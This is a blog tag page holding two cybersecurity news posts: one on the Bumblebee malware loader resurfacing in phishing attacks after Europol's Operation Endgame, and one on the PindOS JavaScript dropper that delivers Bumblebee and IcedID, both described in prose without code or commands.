Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Bumblebee. Show all posts
TrickBot
Bumblebee Cyberattack Cybersecurity Europol malware MSI Netskope phishing Ransomware TrickBot

Bumblebee Malware Resurfaces in New Attacks Following Europol Crackdown

 

iThe Bumblebee malware loader, inactive since Europol's 'Operation Endgame' in May, has recently resurfaced in new cyberattacks. This malware, believed to have been developed by TrickBot creators, first appeared in 2022 as a successor to the BazarLoader backdoor, giving ransomware groups access to victim networks.

Bumblebee spreads through phishing campaigns, malvertising, and SEO poisoning, often disguised as legitimate software such as Zooom, Cisco AnyConnect, ChatGPT, and Citrix Workspace. Among the dangerous payloads it delivers are Cobalt Strike beacons, data-stealing malware, and ransomware.

Operation Endgame was a large-scale law enforcement effort that targeted and dismantled over a hundred servers supporting various malware loaders, including IcedID, Pikabot, TrickBot, Bumblebee, and more. Following this, Bumblebee activity appeared to cease. However, cybersecurity experts at Netskope have recently detected new instances of the malware, hinting at a possible resurgence.

The latest Bumblebee attack involves a phishing email that tricks recipients into downloading a malicious ZIP file. Inside is a .LNK shortcut that activates PowerShell to download a harmful MSI file disguised as an NVIDIA driver update or Midjourney installer.

This MSI file is executed silently, and Bumblebee uses it to deploy itself in the system's memory. The malware uses a DLL unpacking process to establish itself, showing configuration extraction methods similar to previous versions. The encryption key "NEW_BLACK" was identified in recent attacks, along with two campaign IDs: "msi" and "lnk001."

Although Netskope hasn't shared details about the payloads Bumblebee is currently deploying, the new activity signals the malware’s possible return. A full list of indicators of compromise can be found on a related GitHub repository.
Read more »
threats from ransomware
Bumblebee IcedID Malware malware threats from ransomware

New PindOS JavaScript Dropper Deploys Bumblebee, IcedID Malware

A newly identified malicious tool dubbed PindOS has been uncovered by security researchers. This particular tool functions as a JavaScript-based malware dropper, specifically designed to retrieve subsequent-stage payloads responsible for delivering the final payload utilized by attackers. 

The delivered payloads are associated with notorious malware strains such as Bumblebee and IcedID, commonly employed in ransomware attacks. In the past, Bumblebee and IcedID have been observed as effective means of deploying various types of malware, including ransomware, on compromised computer systems. 

These two malware strains have gained notoriety for their involvement in facilitating cyberattacks and enabling unauthorized access to targeted machines. Now, the newly discovered PindOS emerges as a JavaScript-based malware dropper, serving as a delivery mechanism for these well-known threats. 

Its primary purpose is to fetch subsequent-stage payloads that ultimately deliver the attackers' final payload, which often leads to devastating consequences for the targeted systems and their owners. According to a recent report by cybersecurity firm DeepInstinct, the newly discovered PindOS malware dropper demonstrates a straightforward yet effective functionality. 

It encompasses a single function accompanied by four parameters, enabling the download of the desired payload. This payload can either be the notorious Bumblebee malware or the IcedID banking trojan, which has been repurposed as a malware loader. Initially presented in an obfuscated form, the JavaScript dropper, upon decoding, exposes its surprisingly simplistic nature. 

Its configuration includes the provision to specify a user agent for downloading a DLL payload. Additionally, it incorporates two designated URLs, namely "URL1" and "URL2," where the payload is stored. Furthermore, the configuration allows for the definition of a RunDLL parameter, which dictates the exported function within the payload DLL to be executed. 

As highlighted by the researchers, an interesting observation about PindOS is its utilization of a redundant second URL parameter. This redundancy serves as a fallback mechanism when the initial attempt to retrieve the payload from the first URL fails. In such cases, PindOS employs a combination of PowerShell commands and Microsoft's rundll.exe. Adversaries often leverage rundll.exe as a common method for launching malicious code. 

Therefore, PindOS capitalizes on this frequently exploited technique to execute the payload and accomplish its malicious objectives. Upon successful retrieval, PindOS proceeds to download the payload to a specific location: "%appdata%/Microsoft/Templates/". 

The payload is saved as a DAT file, with a randomized name consisting of six numbers. Notably, the malware employs a tactic known as the "on-demand" generation of malware samples. This strategy ensures that each sample possesses a distinct hash when obtained, thereby evading signature-based detection mechanisms commonly employed by security systems to identify known threats.
Read more »
Subscribe to: Posts (Atom)